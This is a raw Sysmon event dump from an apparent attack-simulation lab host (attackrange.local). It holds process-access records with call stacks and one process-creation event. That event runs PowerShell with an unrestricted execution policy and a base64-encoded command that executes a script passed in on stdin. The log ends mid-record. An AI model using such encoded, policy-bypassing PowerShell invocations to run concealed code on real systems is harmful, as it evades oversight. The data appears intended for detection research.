10341000x800000000000000060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.997{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4258-6000-C902-000000009901}1940C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.981{08A6967A-4258-6000-CA02-000000009901}47364744C:\Windows\system32\conhost.exe{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.965{08A6967A-4259-6000-CC02-000000009901}48725024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+69e5c05b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692fcc65|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692fc936|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+69dae21b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692bd4cc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6931b99b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692ff000|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692ff000|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692fee91|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692f0e16|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692fd349|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692fcf3c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692fcc65|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692fc936|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+69dae21b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692e3797|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+692e2d67 154100x800000000000000098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.979{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4258-6000-5FAB-100000000000}0x10ab5f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4259-6000-CC02-000000009901}4872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.903{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-4259-6000-CC02-000000009901}4872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.903{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-4259-6000-CC02-000000009901}4872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.278{08A6967A-4259-6000-CC02-000000009901}4872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kvvsavho.w2k.ps12021-01-14 13:08:42.278 10341000x800000000000000094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:42.247{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4259-6000-CC02-000000009901}4872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 